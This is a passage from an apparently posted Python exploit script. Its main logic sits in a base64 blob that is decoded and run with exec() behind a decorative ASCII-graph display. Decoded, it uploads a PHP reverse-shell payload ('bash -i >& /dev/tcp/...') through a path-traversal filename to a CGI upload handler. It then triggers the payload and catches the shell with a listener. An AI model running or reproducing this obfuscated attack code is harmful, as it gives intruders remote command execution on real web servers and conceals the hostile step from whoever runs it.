"CAgICAgICAgICAgICAhX2xfDQogICAgb35fLy8p"<br />importer += "ICAgIC"+ "AgICAgICAgIChfXFxffm8NCn5+fn5+fn5+fn5+"<br />importer += "fn5+fn5"+ "+fn5+fn5+fn5+fn5+fn5+fn4NCiAgICAgICAg"<br />importer += "IiIiDQog"+ "ICAgICAgIHByaW50KHRpdGwpDQoNCiAgICBk"<br />importer += "ZWYgdGhl"+ "X3VwbG9hZChzZWxmKToNCiAgICAgICAgcHJp"<br />importer += "bnQoIldy"+ "aXRpbmcgY2FsbGJhY2sgZmlsZS4uLiIpDQog"<br />importer += "ICAgICAg"+ "IHNlbGYuaGVhZGVycyA9IHsiQ29udGVudC1U"<br />importer += "eXBlIiA6"+ "ICJtdWx0aXBhcnQvZm9ybS1kYXRhOyBib3V"<br />importer += "uZGFyeT0"+ "tLS0tVGhlTWVudSIsDQogICAgICAgICAgI"<br />importer += "CAgICAgI"+ "CAgICAgICAiQWNjZXB0LUxhbmd1YWdlI"<br />importer += "iA6ICJlb"+ "i1VUyxlbjtxPTAuOSIsDQogICAgICA"<br />importer += "gICAgICA"+ "gICAgICAgICAgICAiQWNjZXB0LUV"<br />importer += "uY29kaW5"+ "nIiA6ICJnemlwLCBkZWZsYXRlI"<br />importer += "iwNCiAgI"+ "CAgICAgICAgICAgICAgICAgI"<br />importer += "CAgICJVc"+ "2VyLUFnZW50IiA6IHNlbGY"<br />importer += "uc2VjcmV"+ "0YWdlbnQsDQogICAgICA"<br />importer += "gICAgICAg"+ "ICAgICAgICAgICAiQ2Fj"<br />importer += "aGUtQ29udH"+ "JvbCIgOiAibWF4LWFnZT"<br />importer += "0wIiwgDQogI"+ "CAgICAgICAgICAgICAgI"<br />importer += "CAgICAgICAiQ2"+ "9ubmVjdGlvbiIgOiAiY2"<br />importer += "xvc2UiLA0KICAgI"+ "CAgICAgICAgICAgICAgI"<br />importer += "CAgICAgIkFjY2VwdC"+ "IgOiAiKi8qIn0NCiAgIC"<br />importer += "ANCiAgICAgICAgc2VsZ"+ "i5wYXlsb2FkID0gIjw/c"<br />importer += "GhwIGV4ZWMoXCIvYmluL2"+ "Jhc2ggLWMgJ2Jhc2ggLWk"<br />importer += "gPiAvZGV2L3RjcC8iK3Nlb"+ "GYubGhvc3QrIi8iK3N0cih"<br />importer += "zZWxmLmxwb3J0KSsiIDwmM"+ "TtybSBiLnBocCdcIik7Ig0"<br />importer += "KDQogICAgICAgIHNlbGYuZ"+ "GVwbG95ICA9ICItLS0tLS1"<br />importer += "UaGVNZW51XHJcbkNvbnRlbn"+ "QtRGlzcG9zaXRpb246IGZ"<br />importer += "vcm0tZGF0YTsiI3VzDQogICA"+ "gICAgIHNlbGYuZGVwbG9"<br />importer += "5ICs9ICIgbmFtZT1cInVwZ2Zp"+ "bGVcIjsgZmlsZW5hbWU"<br />importer += "9XCIuLi8uLi8uLi8uLi8uLi8uL"+ "i8iI01lDQogICAgICA"<br />importer += "gIHNlbGYuZGVwbG95ICs9ICIuLi"+ "92YXIvd3d3L2IucGh"<br />importer += "wXCJcclxuQ29udGVudC1UeXBlOiB"+ "hcHBsaWNhdGlvbi8"<br />importer += "iI2NvDQogICAgICAgIHNlbGYuZGVw"+ "bG95ICs9ICJvY3R"<br />importer += "ldC1zdHJlYW1cclxuXHJcbiIrc2VsZ"+ "i5wYXlsb2FkKyJ"<br />importer += "cclxuLS0tLS0tVGgiIy4uDQogICAgIC"+ "AgIHNlbGYuZGV"<br />importer += "wbG95ICs9ICJlTWVudVxyXG5Db250ZW5"+ "0LURpc3Bvc2l"<br />importer += "0aW9uOiBmb3JtLWRhdGE7IG5hbWU9XCIi"+ "I24NCiAgICA"<br />importer += "gICAgc2VsZi5kZXBsb3kgKz0gInN1Ym1pd"+ "FwiXHJcblx"<br />importer += "yXG5EbyBpdFxyXG4tLS0tLS1UaGVNZW51LS"+ "1cclxuIiM"<br />importer += "tLS0tLS0NCiAgICANCiAgICAgICAgcmVxdWV"+ "zdHMucG9"<br />importer += "zdChzZWxmLnJob3N0KyIvY2dpLWJpbi91cGxv"+ "YWQuY2d"<br />importer += "pIiwgaGVhZGVycz1zZWxmLmhlYWRlcnMsIGRhd"+ "GE9c2V"<br />importer += "sZi5kZXBsb3kpDQogICAgICAgIHNsZWVwKDEpIC"+ "ANCiA"<br />importer += "gICAgICAgcmVxdWVzdHMuZ2V0KHNlbGYucmhvc3Q"+ "rIi9"<br />importer += "iLnBocCIpDQoNCiAgICBkZWYgdGhlX3N1YnAoc2Vs"+ "Zik"<br />importer += "6DQogICAgICAgIGtvbmFjID0gdGhyZWFkaW5nLlRoc"+ "mV"<br />importer += "hZChuYW1lPSJaU0wiLCB0YXJnZXQ9c2VsZi50aGVfZW"+ "F"<br />importer += "yKQ0KICAgICAgICBrb25hYy5zdGFydCgpDQogICAgIC"+ "A"<br />importer += "gIHNsZWVwKDEpDQogICAgICAgIHNlbGYudGhlX3VwbG"+ "9"<br />importer += "hZCgpDQoNCiAgICBkZWYgdGhlX2VhcihzZWxmKToNC"+ "iA"<br />importer += "gICAgICAgdGVsbmV0dXMgPSB0ZWxuZXRsaWIuVGVs"+ "bmV"<br />importer += "0KCkNCiAgICAgICAgcHJpbnQoIlN0YXJ0aW5nIGh"+ "hbmR"<br />importer += "sZXIgb24gcG9ydCB7fS4iLmZvcm1hdChzZWxmLm"+ "xwb3J"<br />importer += "0KSkNCiAgICAgICAgcyA9IHNvY2tldC5zb2NrZ"+ "XQoc29"<br />importer += "ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX1NU"+ "UkVBTSk"<br />importer += "NCiAgICAgICAgcy5iaW5kKCgiMC4wLjAuMCI"+ "sIHNlbGY"<br />importer += "ubHBvcnQpKQ0KICAgICAgICB3aGlsZSBUcn"+ "VlOg0KICA"<br />importer += "gICAgICAgICAgdHJ5Og0KICAgICAgICAgI"+ "CAgICAgIHM"<br />importer += "uc2V0dGltZW91dCg3KQ0KICAgICAgICAg"+ "ICAgICAgIHM"<br />importer += "ubGlzdGVuKDEpDQogICAgICAgICAgICA"+ "gICAgY29ubiw"<br />importer += "gYWRkciA9IHMuYWNjZXB0KCkNCiAgIC"+ "AgICAgICAgICA"<br />importer += "gICBwcmludCgiQ29ubmVjdGlvbiBmc"+ "m9tIHt9Ont9Ii5"<br />importer += "mb3JtYXQoYWRkclswXSwgYWRkclsx"+ "XSkpDQogICAgICA"<br />importer += "gICAgICAgICAgdGVsbmV0dXMuc29"+ "jayA9IGNvbm4NCiA"<br />importer += "gICAgICAgICAgIGV4Y2VwdCBzb2"+ "NrZXQudGltZW91dCB"<br />importer += "hcyBwOg0KICAgICAgICAgICAgI"+ "CAgIHByaW50KCJIbW1"<br />importer += "tICh7bXNnfSkiLmZvcm1hdCht"+ "c2c9cCkpDQogICAgICA"<br />importer += "gICAgICAgICAgcy5jbG9zZSg"+ "pDQogICAgICAgICAgICA"<br />importer += "gICAgZXhpdCgwKQ0KICAgIC"+ "AgICAgICAgYnJlYWsNCg0"<br />importer += "KICAgICAgICBwcmludCgiW"+ "W91IGdvdCBzaGVsbC4iKQ0"<br />importer += "KICAgICAgICB0ZWxuZXR1"+ "cy5pbnRlcmFjdCgpDQogICA"<br />importer += "gICAgIGNvbm4uY2xvc2U"+ "oKQ0KDQogICAgZGVmIG1haW4"<br />importer += "oc2VsZik6DQogICAgIC"+ "AgIHNlbGYudGhlX2FyZ3MoKQ0"<br />importer += "KICAgICAgICBzZWxmL"+ "nRoZV9zdWJwKCkNCg0KaWYgX19"<br />importer += "uYW1lX18gPT0gJ19f"+ "bWFpbl9fJzoNCiAgICBWaWRlb0t"<br />importer += "pbGxlZFRoZVJhZGl"+ "vU3RhcigpLm1haW4oKQ0K"######"<br />retropmi = "U2VjdXJpdHkgaXM"+ "gbGlrZSBhbiBvbmlvbjogdGhlIG1v"<br />retropmi += "cmUgbGF5ZXJzIH"+ "lvdSBwZWVsLCB0aGUgbW9yZSBpdCBz"<br />retropmi += "dGlua3Mu"####"+ "###############################"<br /><br />radio_code = base64.b64decode(importer)<br /><br />curves = [ord(c) for c in retropmi]<br /><br />maxi = max(curves)<br />mini = min(curves)<br />code_range = maxi - mini<br /><br />jcoords = [int(20 * (1 - (codeio - mini) / code_range)) for codeio in curves]<br /><br />for y in range(20, 0, -1):<br /> line = ""<br /> for x in range(len(jcoords)):<br /> if jcoords[x] >= y:<br /> line += "-"<br /> else:<br /> line += " "<br /> print(line)<br /> time.sleep(0.03/1.337)<br /><br />exec(radio_code)<br /></code></pre>